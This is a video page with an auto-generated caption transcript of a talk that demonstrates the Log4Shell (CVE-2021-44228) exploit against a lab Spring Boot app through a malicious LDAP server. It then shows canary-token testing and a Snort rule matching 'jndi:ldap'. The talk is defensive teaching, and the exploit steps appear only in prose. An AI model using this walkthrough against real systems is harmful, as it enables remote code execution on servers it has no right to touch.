CVE-2021-44228 (Log4Shell) - Exploitation/Detection

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

right here all right all right hello everyone i hope you're all having a good weekend so this week we're going to take a look at this new cve 2021 44228 also known as log shell so my agenda for today is to first show an example of log for shell exploitation uh second we're going to show how we could use the new log for shell canary token and then finally we are going to show how we can detect this with snort so a little bit of a background this week there was a zero day called log for shell as i mentioned was discovered and it results in remote code execution from blocking a particular string and this vulnerable log4j library is found in a lot of java applications so this makes it a really critical vulnerability um and from what i'm reading it just seems to be getting worse and worse like i can even keep track of everything that's going on right now um so let's dive in let's see how it works let's analyze some network traffic with snort and we will see how we can detect this so if you see on my screen here uh we're about to run this vulnerable java application so this vulnerable java application is called spring boot and it's an open source java based framework that you could create a micro service with so in this particular app it's going to log an x api version from the http header uh on the the server and that's what's making it vulnerable so i just wanted to show real quick uh you guys could see on my firefox right but yeah okay i just want to show real quick what that application looks like just so we have an idea so we could see here that this request header gets logged and we can see that it's using this log4j uh package which is vulnerable so let me go back here let's start up the app um while that's going let's just see real here so let's just talk about the exploit requirements um so the server has to have a vulnerable a log4j version like the one that i showed you the endpoint must have a protocol like http tcp i think it's even exploitable over udp and i've seen quite a few others as well if you take a look at like emerging threat snort rules you can kind of see all the different protocols there um and finally the um it's gonna have to log out the string like we showed you so okay this is running here so the second thing we're gonna have to do is we're gonna want to download this jndi exploit um ldaps it's a uh it's a github package i don't have it up here actually but it's basically just a malicious ldap server that is going to handle a request so it's once we log that string it's going to make a request out to our ldap server here that we're going to start so i already have this installed but if you don't you can just do wget on this github then you just unzip jndi exploit um but i already have that so we're just going to start that up let's just change our ip make sure we know that i guess i don't have that um okay oh yeah oh is that what i did i've been using powershell so much lately that i'm starting to mix it up me too thank you all right so we're going to start this up you can see here just take note of this because this is not normal i don't think i never see ldap listening on this port but i guess it does have the 389 so just keep note of that um and let's just clean this up real fast um okay just trying to get everything together here so what we're gonna do here is we're going to run this exploit against it and what this is doing here is it's going to log like i mentioned it's going to log the x api version and what this is doing here we could actually take a look oh i just accidentally opened that link um so what this is doing here is it's just going to make a pawn file in the temp directory so we're going to just see if that works but first let's make sure we fill in our ip here and let's send it so we sent this to the server could actually see that it was received and let's actually let's actually take a look and see if it actually is on the server here um so if we take a look what this is doing is this is just executing a docker and just showing us the output of the temp directory and we can see that that pawn file that we created where is it here was created so that's pretty cool but i actually found out this morning that they even have this canary token um do i have it up here no i do not but i i do have it ready to go so there's this um canary token that i already generated here and let me just move i have everybody in the corner here i can't even see my screen um so this canary token um if the if this exploit is or if this application is vulnerable it's going to generate a canary token that i'm going to receive in my inbox here you can see this morning i already received one so let's try that and actually i'm not too sure if anybody in here knows but this just kind of hangs like this but it should still trigger it unless something went wrong but it did take a little while this morning did you have to specify your host name or is that already set that's what i thought this morning cause i tried that and it didn't work and it actually is hostname like that uh i thought that was very weird myself um let me find it maybe i did get something wrong or maybe it only lasts for a little while does anybody know maybe i needed to generate a new one oh [Music] uh let's take a look no that did not happen but when i did test this this morning it did so you know what why don't we let me try it out real quick what is it canarytokens.org let's just search uh so we can select our token and it's the new log for shell one provide an email address it's just a backup email and a reminder note uh we'll just do first shell was successful now let's create our token copy this in and let's give this another try it doesn't look like it likes it for some reason now [Music] oh no it did nice good yeah cool all right so yeah that's how we could use this new canary token i was thinking that it was going to be used for something else like i thought um it would be more of a honeypot but this is really just so you could use it and see if the xsplit actually works and it's actually kind of similar i don't know if you guys saw there's this log for shell by huntress which is very similar to what i just used um i guess let me just show that real quick so you could also use this as well and like you would copy this in and then you would go in here and view the connections which is just similar to um it's sending it back to me as an email so yeah that's that part so um we already verified that that worked so now let's do some detection with snort so let's open this up let's go into our pcaps so you um i i didn't record the pcaps right now i forgot to do that but i did it earlier so if you want to do that yourself you can just do sudo tcp dump uh i docker zero for the docker interface and then you could just write it out too you just say log for shell.pcapp but i already did that um so let's take a look at the this is the first exploit that we did remember this this just was um creating that pawn file um and then this is the uh pcap for that so let's check that out with wire shark okay i believe this is it yeah you can see it down there so let's follow that and how so yeah so what we're going to want to do here is so we're going to want to look at inside this payload and we're going to want to look for something like jndi colon ldap and that's something that we could do with snort with their content um just with content with snort and i'll show that in a second here so let's close this and let's take a look at our snort configuration here or our snort rule that we're going to create that's in vim etsy snort rules and then local.rules are any custom rules that you're going to use the other ones are just default snort rules so we're gonna use one very similar to the one that uh crowdstrike posted yesterday uh because it's very simple but i'm gonna tell you right now that it's not the most effective because there's they've found out a lot there's a lot more um ways to obfuscate this payload but this is just an example so we could see how to use this and uh in practice so this is pretty inefficient but this is just looking for any tcp from any ip any port going to any ip or any port and we can actually just we could make our own message here so the message oh whoops this is a read-only file whoops um okay that's much better so this message is just gonna be the alert that it shows when we run snort and the rule was successful so we'll just say um log for shell detected and the content we're going to look for if you remember looking at wireshark or our um our exploit which was up here it just has this jndi ldap so that's all we're going to look for here and to make it a bit more efficient we can add the the flow that we want to look for so we could say from client and we could also say establish so we want to see this payload come from a client going to an http or going to some vulnerable application we want to make sure that it was already established because we don't want to waste our snort resources looking at every single packet we want to make sure that the the tcp handshake has already been established here and we can just define a class type uh the sid always has to be a unique value otherwise it won't alert and this isn't usually the revision number that looks like somebody took quite a few revisions here to get that one working i don't know why they use that um and then usually just put a reference at the end um all right so as i showed you guys this touchdown pcap let's now use snort and i don't have it in my history so i have it copied here um let's show how we can test with snort so this is going to use our snort configuration this is just the default store configuration that you get once you install it this is just going to say alert out to our console so just alert to the uh terminal here uh we're gonna read in our pcap which that is the wrong one um we want to log this so i have a log directory um actually i don't in here that's a good thing to note so that's going to just log it here and i found and i i actually don't remember what this means this dash k none but when i was trying it yesterday like i i took one of these sans courses where we had to do this and i could not figure out for the life of me why i was able to get it in the sands class and i couldn't get it on this this terminal and it was this k dash nun so actually let's just take a look real quick and see what that is cause now i'm curious um it's just saying logging mode none very odd that it wouldn't work if anybody in here knows let me know but um yeah wasn't that lowercase k uh wasn't it what's the checksum validation yeah i've had to do it with zeke too like if you try to run a pcap like capture pickup you try to run through zeke lots of times the the tcp checksum will be invalid so you just able to check some it'll actually process the packets that makes sense okay yep i remember learning that now thank you and yeah you're right i was looking at the wrong one okay so that's interesting and q i believe is just don't show like when sword is initializing i don't know if anybody's ever played around with snort like this before but when it initializes you just see all this stuff printed out to the screen that you really don't need to see so we run this and since we see that since we see this output we know that the snort alert worked on that pcap so is a really good way to test snort rules against network traffic that you're seeing and sometimes it's nice to to do an exploit like i just did record it and then do it in your own lab before doing it in production um but i really want to take a look here because that is not the most efficient rule we could do i would highly recommend that you go to like a page like emerging threats and pull down their snort rules because their security engineers are working on this you know way more than i am and they're probably all collaborating on it um so it's a good idea to pull these down and take a look at them yourself um you can see they're doing stuff here like they're inspecting the the bytes so 3a i believe is a colon um so it's just a much much more efficient rule than we wrote but it's still important to be able to write your own rules here because maybe this zero day comes out and one of the uh one of the your favorite um like threat plays like um threat intel like emerging threats doesn't have this yet so it's important to be able to know how to write your own and be able to do this on your own um for some advanced threats um and finally i just wanted to talk real quick where is that i just want to talk real quick about some of the different payloads that i've seen online and like when you're hunting just to be aware that you know we we used a payload like this but i there's they've seen payloads like this i've personally seen payloads like this um so it's you know there's a lot of different ways to go about this and you can't just look for this one particular string here um and i have you know i have the source up here where these were found from um and finally actually um if you have a web application firewall there's a lot of companies that are coming out with like templates right now that'll help detect this as it keeps evolving so just uh be aware of that and check your web application firewall to see if they have something available um all right so with that that was log for shell uh good luck everyone awesome thanks

Info

Channel: Kandy Phan

Views: 2,036

Rating: undefined out of 5

Keywords:

Id: VLBKd429K2Y

Channel Id: undefined

Length: 16min 10sec (970 seconds)

Published: Sun Dec 12 2021